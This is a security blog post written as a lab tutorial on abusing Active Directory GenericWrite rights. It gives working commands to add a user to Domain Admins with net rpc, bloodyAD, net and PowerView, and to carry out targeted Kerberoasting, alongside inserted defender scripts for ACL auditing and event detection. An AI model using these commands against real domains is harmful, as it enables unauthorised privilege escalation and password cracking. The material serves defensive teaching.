DACL Attacks

Abusing AD-DACL: GenericWrite

In this post, we explore GenericWrite Active Directory abuse, focusing on how attackers exploit Discretionary Access Control Lists (DACLs) to escalate privileges. By abusing the GenericWrite permission, adversaries can modify group memberships, service principal names, or login scripts—leading to lateral movement or domain dominance.

The lab setup necessary to simulate these attacks is outlined, with methods mapped to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Detection mechanisms for identifying suspicious activities linked to GenericWrite attacks are also covered, alongside actionable recommendations for mitigating these vulnerabilities. This overview equips security professionals with critical insights to recognize and defend against these prevalent threats.

Table of Contents

GenericWrite Permission

Prerequisites

Lab Setup – User Owns GenericWrite Permission on the Domain Admin Group

Exploitation Phase I – User Owns GenericWrite Permission on a Group

Bloodhound – Hunting for Weak Permission

Method for Exploitation – Account Manipulation (T1098)

  • Linux Net RPC – Samba
  • Linux Bloody AD
  • Windows Net command
  • Windows PowerShell – Powerview

Lab Setup – User Owns GenericWrite Permission on Another User

Exploitation Phase II – User Owns GenericWrite Permission on Another User

Bloodhound – Hunting for Weak Permission

Method for Exploitation – Kerberoasting (T1558.003)

  • Linux Python Script – TargetedKerberoast
  • Windows PowerShell – Powerview

Detection & Mitigation

GenericWrite Permission

The GenericWrite permission in Active Directory allows a user to modify all writable attributes of an object, except for properties that require special permissions such as resetting passwords.

If an attacker gains GenericWrite over a user, they can write to the servicePrincipalNames attribute and immediately initiate a targeted Kerberoasting attack.
Moreover, having GenericWrite over a group enables them to add their account—or one they control—directly to that group, effectively escalating privileges.
Alternatively, if the attacker obtains GenericWrite over a computer object, they can modify the msDS-KeyCredentialLink attribute. As a result, they create Shadow Credentials and authenticate as that computer account using Kerberos PKINIT.

Prerequisites

  • Windows Server 2019 as the Domain Controller
  • Kali Linux
  • Tools: BloodHound, Net RPC, PowerView, bloodyAD
  • Windows 10/11 as client

Lab Setup – User Owns GenericWrite Permission on the Domain Admin Group

Create the Active Directory Environment:

To simulate an Active Directory environment, set up a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) to run enumeration and exploitation tools.

Domain Controller:

  • First, install Windows Server (2016 or 2019 recommended).
  • Then, promote it to a Domain Controller by adding the Active Directory Domain Services role.
  • Finally, set up the domain (e.g., ignite.local).

User Accounts:

  • Next, create a standard user account named Anuradha:
net user anuradha Password@1 /add /domain

Assign the “GenericWrite” Privilege to Anuradha:

Once you configure the AD environment, assign the GenericWrite privilege to Anuradha for the Domain Admins group.

Steps:

  • Open Active Directory Users and Computers (ADUC) on the Domain Controller.
  • Enable the Advanced Features view by clicking on View > Advanced Features.
  • Locate the Domain Admins group in the Users container.
  • Right-click on Domain Admins and go to Properties.

  • Navigate to the Security tab, then click on Add.

  • In the “Enter the object name to select” box, type Anuradha and click Check Names, and then click on OK.

  • In the Permissions section, check the box for Write permission.

  • Selecting the Write checkbox automatically enables Add/remove self as member.

After applying the settings, Anuradha now has GenericWrite and AddSelf rights over the Domain Admins group. Consequently, she can add herself—or any principal she controls—to the group.
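As a defender-side check added here (not part of the original post), the script below parses the SDDL of a sensitive object's DACL and flags write rights held by principals outside the expected admin set. It assumes the SDDL was exported from the DC, for example with (Get-Acl 'AD:\CN=Domain Admins,CN=Users,DC=ignite,DC=local').Sddl in PowerShell; the embedded SDDL and Anuradha's SID are constructed placeholders.

```python
import re

# Rights abbreviations (SDDL ACE string syntax) that let a principal alter the object.
WRITE_RIGHTS = {"GA": "GenericAll", "GW": "GenericWrite", "WP": "WriteProperty",
                "SW": "Self (validated writes such as add/remove self as member)",
                "WD": "WriteDacl", "WO": "WriteOwner"}
# The same rights as access-mask bits, for ACEs whose rights are written as a hex mask.
MASK_RIGHTS = {0x10000000: "GA", 0x40000000: "GW", 0x20: "WP", 0x8: "SW",
               0x40000: "WD", 0x80000: "WO"}
# Well-known SID aliases expected to hold write rights on a Tier-0 object.
TRUSTED = {"DA", "EA", "BA", "SY", "DD"}   # Domain/Enterprise Admins, Administrators, SYSTEM, DCs
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

def dacl_aces(sddl):
    """Yield (ace_type, rights, object_guid, trustee) for each ACE in the D: section only."""
    m = re.search(r"D:[^(]*((?:\([^)]*\))*)", sddl)
    for ace in ACE_RE.finditer(m.group(1) if m else ""):
        ace_type, _flags, rights, obj_guid, _inherit_guid, trustee = ace.groups()
        yield ace_type, rights, obj_guid, trustee

def split_rights(rights):
    """'RPWPCR' -> ['RP', 'WP', 'CR']; a hex mask such as '0x40000028' is decoded to codes."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return [code for bit, code in MASK_RIGHTS.items() if mask & bit]
    return [rights[i:i + 2] for i in range(0, len(rights), 2)]

def find_weak_write_aces(sddl, trusted=TRUSTED):
    """Return (trustee, right, scope) for every allow ACE granting a write right to an
    untrusted principal; an object GUID means the right is limited to one attribute or
    validated write rather than the whole object."""
    findings = []
    for ace_type, rights, obj_guid, trustee in dacl_aces(sddl):
        if ace_type not in ("A", "OA") or trustee in trusted:
            continue
        for code in split_rights(rights):
            if code in WRITE_RIGHTS:
                scope = f"limited to {obj_guid}" if obj_guid else "whole object"
                findings.append((trustee, WRITE_RIGHTS[code], scope))
    return findings

# Constructed SDDL for the Domain Admins group after the lab change: the ADUC "Write"
# checkbox grants WriteProperty (WP) and the validated writes (SW) to Anuradha's SID (placeholder).
ANURADHA_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
DOMAIN_ADMINS_SDDL = ("O:DAG:DAD:PAI(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
                      "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)(A;;RPLCLORC;;;AU)"
                      f"(A;;RPWPSW;;;{ANURADHA_SID})")

if __name__ == "__main__":
    for trustee, right, scope in find_weak_write_aces(DOMAIN_ADMINS_SDDL):
        print(f"{trustee} holds {right} ({scope})")
```

Any finding on a Tier-0 object such as Domain Admins is a misconfiguration to remove; running this over the Sddl of every admin group and account in the domain is the audit counterpart of the BloodHound hunt that follows.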

Exploitation Phase I – User Owns GenericWrite Permission on a Group

Bloodhound – Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Anuradha has the GenericWrite permission on the Domain Admins group.

bloodhound-python -u anuradha -p Password@1 -ns 192.168.1.7 -d ignite.local -c All

In the BloodHound graph, select the Anuradha node and inspect Outbound Object Control; the First Degree Object Control count is 1.

Expanding it shows that the Anuradha user holds GenericWrite and AddSelf over the Domain Admins group.

Method for Exploitation – Account Manipulation (T1098)

Linux Net RPC – Samba

The tester can abuse this permission by adding the Anuradha user to the Domain Admins group and then listing the group's members to confirm that Anuradha has become a Domain Admin.

net rpc group addmem "Domain Admins" anuradha -U ignite.local/anuradha%'Password@1' -S 192.168.1.7

Linux Bloody AD

Alternatively, the same can be achieved with bloodyAD:

bloodyAD --host "192.168.1.7" -d "ignite.local" -u "anuradha" -p "Password@1" add groupMember "Domain Admins" "anuradha"

Windows Net command

The same can be achieved from a domain-joined Windows host with the native net command.

net group "domain admins" anuradha /add /domain

The user's Member Of tab now shows that Anuradha is a member of Domain Admins.

Windows PowerShell – Powerview

The attacker can add a user, group or computer to a group, either with the Active Directory PowerShell module or with Add-DomainGroupMember from the PowerView module.

powershell -ep bypass
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password@1' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('ignite.local\anuradha', $SecPassword)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'anuradha' -Credential $Cred

Lab Setup – User Owns GenericWrite Permission on Another User

In this lab setup we create two users, Krishna and Radha, where the Radha user has GenericWrite permission over the Krishna user.

Create the AD Environment and User accounts

  • Create two AD user accounts named Krishna and Radha:
net user krishna Password@1 /add /domain
net user radha Password@1 /add /domain

Assign the “GenericWrite” Privilege:

  • Open Active Directory Users and Computers (ADUC) on the Domain Controller.
  • Enable the Advanced Features view by clicking on View > Advanced Features.
  • Locate the Krishna user in the Users container.
  • Right-click on the Krishna user and go to Properties.
  • Go to the Security tab and click on the Add button.
  • In the “Enter the object name to select” box, type Radha and click Check Names, then click OK.
  • Select the Radha user and, in the Permissions section, check the box for Write.
  • Apply the settings.

At this point, Radha has GenericWrite permission over the Krishna user.

Exploitation Phase II – User Owns GenericWrite Permission on Another User

Bloodhound – Hunting for Weak Permission

Hunt for First Degree Object Control for the Radha user, as demonstrated in the previous steps.

bloodhound-python -u anuradha -p Password@1 -ns 192.168.1.7 -d ignite.local -c All

From the graph it can be observed that the Radha user holds the GenericWrite privilege over the Krishna user.

Method for Exploitation – Kerberoasting (T1558.003)

This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target.

Linux Python Script – TargetedKerberoast

From UNIX-like systems, this can be done with targetedKerberoast.py (Python).

The resulting ticket hash can then be attacked offline with John the Ripper and a dictionary such as rockyou, which lets the attacker recover a weak password.

./targetedKerberoast.py --dc-ip '192.168.1.7' -v -d 'ignite.local' -u 'radha' -p 'Password@1'

Windows PowerShell – Powerview

From Windows machines, this can be achieved with Set-DomainObject and Get-DomainSPNTicket (PowerView module).

powershell -ep bypass
Import-Module .\PowerView.ps1
Set-DomainObject -Identity 'krishna' -Set @{serviceprincipalname='nonexistent/hacking'}
Get-DomainUser 'krishna' | Select serviceprincipalname
$User = Get-DomainUser 'krishna'
$User | Get-DomainSPNTicket

Detection & Mitigation
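An added detection example (not from the original post) that replays both abuse paths over constructed Windows Security events: a member added to Domain Admins (4728/4732/4756), a servicePrincipalName or msDS-KeyCredentialLink write (5136), and an RC4 service-ticket request for a user account (4769), correlating an SPN write with the ticket request that follows it. The event dicts and the ignite.local names are constructed; 5136 only appears when Directory Service Changes auditing and an object SACL are configured.

```python
SENSITIVE_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}   # member added to a global/local/universal security group
WATCHED_ATTRS = {"servicePrincipalName", "msDS-KeyCredentialLink"}  # attributes written via GenericWrite
RC4_HMAC = "0x17"                        # TicketEncryptionType of a crackable RC4 TGS in event 4769

def cn_of(dn):
    """'CN=krishna,CN=Users,DC=ignite,DC=local' -> 'krishna'."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def detect(events):
    """Walk Security events in order and return one alert string per suspicious event.
    Event 5136 is only written when 'Audit Directory Service Changes' is enabled and the
    object carries a SACL; 4728/4732/4756 and 4769 are part of default DC auditing."""
    alerts, spn_written = [], set()      # accounts whose SPN was modified earlier in the stream
    for e in events:
        eid, d = e["EventID"], e["EventData"]
        if eid in GROUP_ADD_EVENTS and d.get("TargetUserName") in SENSITIVE_GROUPS:
            alerts.append(f"T1098 group add: {d['SubjectUserName']} added "
                          f"{cn_of(d['MemberName'])} to {d['TargetUserName']}")
        elif eid == 5136 and d.get("AttributeLDAPDisplayName") in WATCHED_ATTRS:
            target = cn_of(d["ObjectDN"])
            if d["AttributeLDAPDisplayName"] == "servicePrincipalName":
                spn_written.add(target)
            alerts.append(f"T1098 attribute write: {d['SubjectUserName']} modified "
                          f"{d['AttributeLDAPDisplayName']} on {target}")
        elif eid == 4769 and d.get("TicketEncryptionType") == RC4_HMAC:
            svc = d["ServiceName"].lower()
            if svc.endswith("$"):
                continue                 # computer accounts have random passwords; not a Kerberoast target
            level = ("targeted Kerberoast (SPN written, then RC4 TGS)" if svc in spn_written
                     else "possible Kerberoast (RC4 TGS for a user account)")
            alerts.append(f"T1558.003 {level}: {d['TargetUserName']} requested a ticket for {svc}")
    return alerts

# Constructed sample events mirroring the lab in this post (not real log output).
SAMPLE_EVENTS = [
    {"EventID": 4728, "EventData": {"SubjectUserName": "anuradha", "TargetUserName": "Domain Admins",
                                    "MemberName": "CN=anuradha,CN=Users,DC=ignite,DC=local"}},
    {"EventID": 4624, "EventData": {"TargetUserName": "radha"}},   # ordinary logon, ignored
    {"EventID": 5136, "EventData": {"SubjectUserName": "radha", "AttributeLDAPDisplayName": "servicePrincipalName",
                                    "ObjectDN": "CN=krishna,CN=Users,DC=ignite,DC=local"}},
    {"EventID": 4769, "EventData": {"TargetUserName": "radha@IGNITE.LOCAL", "ServiceName": "krishna",
                                    "TicketEncryptionType": "0x17"}},
    {"EventID": 4769, "EventData": {"TargetUserName": "DC01$@IGNITE.LOCAL", "ServiceName": "DC01$",
                                    "TicketEncryptionType": "0x12"}},   # AES ticket, computer account, ignored
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The mitigation side is to remove the GenericWrite/WriteProperty/Self ACEs that non-admin principals hold on privileged groups and accounts, keep an SPN-bearing user accounts list short with long passwords or gMSAs, and enable AES-only Kerberos for them so an RC4 request itself becomes an anomaly.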

Author: Pradnya Pawar is an InfoSec researcher and Security Tech Lead.